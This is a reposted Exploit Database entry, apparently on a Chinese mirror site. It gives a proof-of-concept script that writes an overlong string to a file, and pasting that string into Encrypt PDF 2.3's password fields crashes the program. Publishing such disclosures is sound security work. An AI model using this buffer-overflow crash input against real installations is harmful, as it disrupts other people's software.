Encrypt PDF 2.3 – Denial of Service (PoC)

Exploit Database
91 阅读

作者： Alejandra Sánchez

日期： 2019-05-20
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46871/

# -*- coding: utf-8 -*-
# Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://www.verypdf.com/encryptpdf/encryptpdf.exe
# Version: 2.3
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "EncryptPDF.py", it will create a new file "EncryptPDF.txt"
# 2.- Copy the text from the generated EncryptPDF.txt file to clipboard
# 3.- Open Encrypt PDF v2.3
# 4.- Go to 'Setting', paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 5.- Click on 'Open PDF(s)', when you import a pdf file, you will see a crash

buffer = "\x41" * 1000

f = open ("EncryptPDF.txt", "w")
f.write(buffer)
f.close()

last Exploits
Encrypt PDF 2.3 – Denial of Service (PoC)的更多信息

Microsoft Windows – Uniscribe Font Processing Heap Out-of-Bounds Write in ‘USP10!UpdateGlyphFlags’ (MS17-011)：
libtiff 3.9.5 – Integer Overflow：
VSCO 1.1.1.0 – Denial of Service (PoC)：
Apple Mac OSX Kernel – Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type：
JetAudio 8.1.3 – ‘.mp4’ Crash (PoC)：
Baidu Spark Browser 26.5.9999.3511 – Remote Stack Overflow (Denial of Service)：
Watchr 1.1.0.0 – Denial of Service (PoC)：
Personal File Share 1.0 – Denial of Service：